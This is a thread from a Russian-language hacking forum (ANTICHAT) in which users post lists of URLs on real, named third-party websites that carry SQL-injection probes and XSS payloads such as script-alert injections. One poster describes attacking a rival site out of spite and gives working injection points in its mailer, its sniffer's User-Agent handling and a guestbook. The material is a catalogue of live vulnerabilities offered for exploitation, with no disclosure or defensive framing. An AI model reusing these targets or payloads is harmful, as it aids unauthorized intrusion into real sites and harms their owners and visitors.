ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.privat.ua/search?page=1&m...3C%2Fscript%3E

http://www.kuivstar.net в поиску водим '><script>alert('HakNet')</script>

http://www.tvernews.ru/?newsid=116'29

http://www.spidermania.ru/index.php?action=12&id=9'

http://webchess.ru/index.php?module=...d_img=&stat=ok

http://www.regens.ru/benefits/firms/entrench/

http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb 27748'5

http://drakkar.good.ru/index.php?act=guest&news_position=-4'

http://www.televek.ru/phones/SonyEri...projects/fma/&

http://squash.com.ua/rus/news/?page=27&news_id=50'0

http://karatedojo.uazone.net/printitem.php3?newsid=8'

http://www.kcnti.ru/orgot/lookorg.php?id=8'

http://www.vw-club.ru/anno/show_anno.php?id=366'

http://www.algis.ru/main.php?f=21&n=10&id=18'0

http://www.gerdabook.ru/vet/view.php?id=5017'2

http://_http://www.ce.unipr.it/~ghel...body.php?page=
http://_http://www.edu.ru/modules.ph...=viewlink&cid=

ВНИМАТЕЛЬНО ЧИТАЕМ ПЕРВЫЙ ПОСТ!!! ССЫЛКИ ОСТАВЛЯТЬ ТОЛЬКО В ТАКОМ ФОРМАТЕ: _http://ваша ссылка

http://www.extrovert.ru/?id=929

http://www.multi-tech.ru/index.php?goto=gallery&showimage=34'

http://www.notoshoes.ru/singl.php?tp=2&p=7&tid=33400'

http://www.astmui.ru/index.php?id=news_more&news_id=1'

http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb 27748'5

http://mediapro.com.ua/news/text.php?id=47'3

http://noclick.net.ru/nav.php

http://www.gruzautoland.ru/auto/show.php?id=5'6

http://www.comquest.ru/news/show_news.php?uid=2'3

http://www.cato.ru/pages/151?idpage=148'

http://www.kaz.kz/top/kom.php?id=1'

http://forumy.ru/chumakov/view.php?dat=20031223133317_1&part=8'

_www.faq-hack.ru

Там лолки, а не админы. Стоит у них сниффер один в один с нашим, ачатовским. Злость пробрала - решил на баги проверить =). Сниффер первый под руку и попался. Там не фильтровалось имя браузера. Буквально 2 минуты на странице сниффера висел замкнутый цикл с алертом в предзноменование того, что я начал ковырять их сайт =).

Теперь к багам... Долго не искал...лень стало...
Нарыл пассивную xss(это в анонимном мэйлере):
_http://faq-hack.ru/onlinesoft/mail/function.php?name=anyname&mymail=antmail&to=asd@as d.ru[XSS]&theme=anytheme

Вторая бага - ошибка скул. Получить её можно, обратившись к снифферу и передав ему в http-заголовке имя браузера с одинарной кавычкой.

_http://customize.ru/gbook/index.php?name="><h1>test1</h1>&mail="><h1>test2</h1>&city="><h1>test3</h1>&mess=anymessage&add=Отправить

Сразу когда по ссыле пройдёте, нифуя не отобразиться. А вот страничку обновите и тогда xss-ки сработают. Просто все данные передаются в кукисы, а когда страницу обновляешь данные из кукисов подставляются в формочки.

http://www.vdvsn.ru/forum/dialogue.phtml?id=276&forumName=10&page=1'

http://www.v21v.ru/katalog/index.php?new_item=1'

http://www.melodi.ru/index.php?p=1137482278&step=1'

http://order.referats.info/content.php?wnum=390'8

http://www.seneka.ru/index.php?secti...BB%D0%B8%D0%BE

http://www.popugay.com/news/printitem.php?newsid=5'

http://html.net/newsletter/default.asp?Email='><script>alert('HakNet')</script>

http://phpt.net/result.php?Keywords='><script>alert()</script>

http://sedoparking.com/parking.php4?...3C%2Fscript%3E